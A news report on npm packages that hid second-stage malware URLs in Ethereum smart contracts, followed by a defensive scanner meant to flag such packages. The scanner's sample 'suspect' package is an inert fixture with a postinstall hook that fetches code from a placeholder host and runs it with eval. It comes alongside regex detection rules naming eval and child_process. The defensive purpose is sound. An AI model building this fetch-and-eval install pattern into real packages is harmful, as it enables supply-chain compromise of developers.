Security researchers at ReversingLabs have uncovered a sophisticated new attack method where hackers are using Ethereum smart contracts to hide malicious code within open-source software packages. The discovery, made public this week, involves two malicious packages uploaded to the Node Package Manager (NPM) repository in July 2025: "colortoolsv2" and "mimelib2".
These packages appeared to be harmless utilities but contained hidden references to Ethereum smart contracts that stored URLs pointing to second-stage malware. When developers integrated these compromised packages into their projects, the hidden code would trigger downloads of dangerous payloads, effectively bypassing traditional security scans that are not designed to inspect blockchain data for threats.
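The detection gap described above is a static-analysis one: a scanner that only looks for hard-coded malicious URLs never sees the address that the package fetches from the chain at install time. What a defender can look for instead is the combination of indicators the technique needs (an install-time hook, an Ethereum contract address or RPC client, a network fetch, and dynamic execution of the fetched data). The heuristic scanner below is an added example written for this article, not code from ReversingLabs or from the packages it describes; its rule names, weights, thresholds and the two sample packages are constructed for illustration, with a zero address and a reserved `.invalid` RPC host so nothing in the sample data is live.

```javascript
// Added example: heuristic scan of an unpacked npm package for the indicator
// combination behind the contract-hosted second stage described in the article.
// Rule ids, weights and thresholds are assumptions chosen for illustration.

const RULES = [
  { id: "INSTALL_HOOK", weight: 2, file: "package.json", re: /"(pre|post)install"\s*:/ },
  { id: "ETH_ADDRESS",  weight: 2, re: /\b0x[0-9a-fA-F]{40}\b/ },
  { id: "ETH_RPC",      weight: 2, re: /\beth_(call|getCode|getStorageAt|getLogs)\b|\bethers\b|\bweb3\b/ },
  { id: "NET_FETCH",    weight: 1, re: /\bhttps?\.get\(|\bfetch\(|\baxios\b/ },
  { id: "DYNAMIC_EXEC", weight: 3, re: /\beval\(|new Function\(|\bchild_process\b|\bvm\.runIn/ },
];

// files: { "<path>": "<source text>" } -> { findings, fired, score, verdict }
function scanPackage(files) {
  const findings = [];
  for (const [path, source] of Object.entries(files)) {
    source.split("\n").forEach((text, idx) => {
      for (const rule of RULES) {
        if (rule.file && rule.file !== path) continue; // file-scoped rules
        if (rule.re.test(text)) findings.push({ rule: rule.id, path, line: idx + 1 });
      }
    });
  }
  const fired = new Set(findings.map((f) => f.rule));
  // Each rule counts once per package, however many lines matched it.
  const score = RULES.filter((r) => fired.has(r.id)).reduce((s, r) => s + r.weight, 0);
  return { findings, fired: [...fired].sort(), score, verdict: verdict(fired, score) };
}

function verdict(fired, score) {
  const onChain = fired.has("ETH_ADDRESS") || fired.has("ETH_RPC");
  const stageTwo = fired.has("NET_FETCH") || fired.has("DYNAMIC_EXEC");
  if (onChain && stageTwo) return "suspicious"; // the shape the article describes
  if (score >= 4) return "review";
  return "clean";
}

const PLACEHOLDER_ADDR = "0x" + "0".repeat(40); // constructed placeholder, not a real contract

// Constructed sample: a plain colour helper with no install hook or network code.
const BENIGN_PKG = {
  "package.json": '{ "name": "rgb-helpers", "version": "1.0.0", "main": "index.js" }',
  "index.js": [
    "module.exports.hexToRgb = (hex) => {",
    '  const n = parseInt(hex.replace("#", ""), 16);',
    "  return [(n >> 16) & 255, (n >> 8) & 255, n & 255];",
    "};",
  ].join("\n"),
};

// Constructed sample sketching the indicator combination only: a postinstall hook,
// an RPC client, a contract address, a fetch and an eval. The host is a reserved
// .invalid name and the address is all zeros, so this is inert test data.
const SUSPECT_PKG = {
  "package.json": '{ "name": "sample-util", "version": "2.0.1", "scripts": { "postinstall": "node setup.js" } }',
  "setup.js": [
    'const { ethers } = require("ethers");',
    'const https = require("https");',
    `const CONTRACT = "${PLACEHOLDER_ADDR}";`,
    'const provider = new ethers.JsonRpcProvider("https://rpc.example.invalid");',
    "provider.call({ to: CONTRACT }).then((url) => https.get(url, (res) => {",
    '  let body = ""; res.on("data", (d) => (body += d)); res.on("end", () => eval(body));',
    "}));",
  ].join("\n"),
};

for (const [name, pkg] of [["benign", BENIGN_PKG], ["suspect", SUSPECT_PKG]]) {
  const r = scanPackage(pkg);
  console.log(`${name}: ${r.verdict} (score ${r.score}) rules=${r.fired.join(",")}`);
  for (const f of r.findings) console.log(`  ${f.path}:${f.line} ${f.rule}`);
}
```

In practice you would feed `scanPackage` the extracted contents of an `npm pack` tarball before it reaches a build host. Legitimate web3 libraries will trip `ETH_RPC` and `ETH_ADDRESS` on their own, which is why the verdict keys on the combination with a fetch or dynamic execution rather than on any single rule; treat "suspicious" as a reason to hold the package for review, and pair the scan with installing under `npm install --ignore-scripts` so a lifecycle hook cannot run before that review happens.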
ReversingLabs researcher Lucija Valentić described this as a "novel technique" highlighting the rapid evolution of detection evasion strategies. The attackers further camouflaged their activity by creating fake GitHub repositories posing as cryptocurrency trading bots, complete with fabricated commits and inflated star counts to appear legitimate.
This development represents a significant escalation in software supply chain attacks, leveraging the immutable nature of blockchain technology to create persistent threats that are difficult to detect and remove once deployed.